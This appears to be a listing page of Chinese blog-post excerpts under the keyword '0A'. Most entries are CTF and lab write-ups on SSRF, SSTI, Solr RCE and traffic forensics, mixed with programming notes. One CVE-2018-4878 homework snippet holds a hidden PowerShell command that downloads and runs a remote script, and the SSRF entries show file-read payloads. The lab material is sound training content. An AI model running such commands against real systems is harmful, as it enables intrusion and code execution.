0A
  • 2024-12-23CS61B 0A Exercises
    虽然以前有Java基础,但是工作四年主要使用的还是python和shell,另外对于数据结构和算法的基础也不牢固。所以开一个坑从头开始学习CS61B,对于Dicussion/Lab/Homework做一个记录,学完之后回头看能有一个收获。整体流程参考CS自学社区,学习课程为B站CS61B,本篇为学习完Lectrue01后的Homew
  • 2024-12-20CTFHub-Web-SSRF
    1.CTFHub-内网访问输入:http:127.0.0.1/flag.php得到 2.CTFHub-伪协议读取文件输入:file:///var/www/html/flag.php,查看页面的源代码。(该路径为flag.php文件的路径)3.CTFHub-端口扫描 (1)输入http://127.0.0.1:8000发现页面没反应,实行爆破。 (2)进行抓包  (3)清除pa
  • 2024-12-182024长城杯威胁检测与网络流量分析
    zeroshell_1他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD0
  • 2024-12-17CTFHub-ssrf
    技能树--Web--SSRF内网访问开启题目尝试访问位于127.0.0.1的flag.php吧进入环境根据提示输入即可127.0.0.1/flag.php伪协议读取文件开启题目尝试去读取一下Web目录下的flag.php吧进入环境,根据提示输入file:///var/www/html/flag.php鼠标右键查看页面源
  • 2024-12-17CTFHUB-web(SSRF)
    内网访问点击进入环境,输入http://127.0.0.1/flag.php伪协议读取文件/?url=file:///var/www/html/flag.php右击查看页面源代码端口扫描1.根据题目提示我们知道端口号在8000-9000之间,使用bp抓包并进行爆破POST请求点击环境,访问flag.php查看页
  • 2024-12-1111.30
    网络安全C10-2024.11.30@所有人作业:CVE-2018-4878漏洞复现powershell-windowstylehidden-execbypass-c"IEX(New-ObjectNet.WebClient).DownloadString('http://10.0.0.164:80/magedu.ps1');test.ps1"实现WAF安装与配置3、WAF绕过SQL注入(1)分别在无WAF和有WAF的情况下,利用SQ
  • 2024-12-01CTF杂项——[NISACTF 2022]where_is_here
    发现文件头是89504E470D0A1A0A在添加文件后缀.png后得到放进百度,会出现很多相似的图片最终找到一张相似的图片最终得到{厦门市思明区鼓浪屿康泰路25号17746048875}
  • 2024-12-09MEXimize the Score
    算法首先观察对于一个确定的数组\(x\),怎么去计算这样的答案对于每一个值\(u\),假设其出现次数为\(Ap_u\),那么最多产生的贡献就为\(\displaystyle\min_{v\lequ}Ap_v\),原因是显而易见的那么怎么对于每一个子串串都计算答案呢,我们考虑串串之间的共同点,对于
  • 2024-12-05DSP 的 CV 算子调用
    01前言DSP是征程5上的数字信号处理器,专用于处理视觉、图像等信息。在OE包的ddk/samples/vdsp_rpc_sample路径下,提供了DSP使用示例,包括nn和CV两部分。nn示例涵盖了深度学习模型的相关算子,包括量化、反量化、Softmax和雷达点云预处理;CV示例展示了如何调用地平线
  • 2024-08-29一道ssrf题目--Web-ssrfme
    目录环境搭建代码分析漏洞点寻找渗透使用工具构造payload结果​编辑 环境搭建使用docker拉取上面文件root@ubuntu:~/web-ssrfme/web-ssrfme#docker-composeup-d代码分析首先进入题目环境,查看docker发现在8091端口下,进入后出现这么个页面查看代码发现file
  • 2024-08-19MISC-666
    MISC-666前言很简单的一道题,主要是涉及hex转图片,文件头PNG文件头:89504E470D0A1A0A文件尾:AE426082题目666.zip解压获得6个txt文件,内容分别如下#189504e470d0a1a0a0000000d494844520000012c0000012c0806000000797d8e75000000017352474200aece1ce900000004674
  • 2024-07-16关于CSRF和SSRF的介绍
    一、CSRF1.简介跨站请求伪造(Cross-SiteRequestForgery,CSRF),也被称为OneClickAttack或者SessionRiding,通常缩写为CSRF,是一种对网站的恶意利用。尽管听起来像XSS,但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的
  • 2024-07-14SSRF结合Redis未授权的打法
    目录SSRF+Redis未授权案例怎么构造redis数据包?ReferenceSSRF不难理解,服务器端请求伪造(英语:Server-sideRequestForgery,简称SSRF)是攻击者滥用服务器功能来访问或操作无法被直接访问的信息的方式之一。服务器端请求伪造攻击将域中的不安全服务器作为代理使用,这与利用网页
  • 2024-05-27QT | 文件读写过程中丢失的 OD OA 问题解决
    今天发现QT以文本方式(QIODevice::Text)写入二进制0x0A会出现问题,写入的是一个字节(实际应该是两个字节),结果在Zed上看,显示是2个字节。明显每个0x0A前都多了个0x0D,导致我的bin文件全部都错位了期望的效果应该是原来按照字节流的形式输出文本时,ofstream会自动将输
  • 2024-05-23PNG图片数据格式
    存储类型[编辑]PNG图片主要由三种类型存储PNG8:图片使用8bits来存储,可以用2的8次方大小个种类颜色来存储一张黑白的图片。也就是说PNG8能存储256种颜色,因为颜色少,文件体积也非常小,一张图片如果颜色简单,将它设置成PNG8的图片是非常省空间合适的。PNG24:图片使用24bits来存储
  • 2024-05-06【 攻防实操系列+漏洞复现 】-- Jinja2 SSTI模板注入
    框架:python---Flask描述:Flask是一个使用Python编写的轻量级Web应用框架。其WSGI工具箱采用Werkzeug,模板引擎则使用Jinja2漏洞复现:Jinja2SSTI模板注入使用vulhub靶场,启动环境先进入容器看一下web服务的代码,得出参数值为name,且可控判断是否存在ssti漏洞,输入:?name={{1*9}},
  • 2024-04-29[FBCTF2019]RCEService
    [FBCTF2019]RCEService打开环境,提示输入JSON格式输入{"cmd":"ls"},只有一个index,php,而且不能读取到这卡住了,找了师傅们的WP发现源码<?phpputenv('PATH=/home/rceservice/jail');if(isset($_REQUEST['cmd'])){$json=$_REQUEST['cmd'];
  • 2024-04-26如何使用wireShark的追踪流功能抓取并还原文件
    简介WireShark的追踪流功能可以帮我们抓取从网络上下载的各种文件,接下来就演示下如何抓取并且进行还原。使用Nginx搭建文件存储服务器只要是通过http网站下载的包,都可以通过追踪流工具进行抓取。这里为了演示,临时搭建一个Nginx文件存储服务器。首先我们准备一台Nginx服务器,把默认
  • 2024-04-12Modbus 存储区 功能码 报文 解析
    存储区   输出线圈   0区  地址范围000001--065536(实际用不到所以有个短地址)00001-09999   输入线圈   1区 地址范围100001--165536                     10001-19999输入寄存器3区 地址
  • 2024-04-04vulhub中Apache Solr 远程命令执行漏洞复现(CVE-2019-0193)
    ApacheSolr是一个开源的搜索服务器。Solr使用Java语言开发,主要基于HTTP和ApacheLucene实现。此次漏洞出现在ApacheSolr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataC
  • 2024-03-24CSRF & SSRF
    CSRF&SSRFCSRFCSRF(Cross-SiteRequestForgery)(跨站请求伪造漏洞)原理用户访问网站,网站给用户cookie,此时攻击者给用户发送了一个诱惑链接,链接里有对该网站的访问代码,用户点击攻击者的链接后,触发恶意代码,攻击者就利用用户的cookie,执行了对网站的请求(以接口形式调用请求)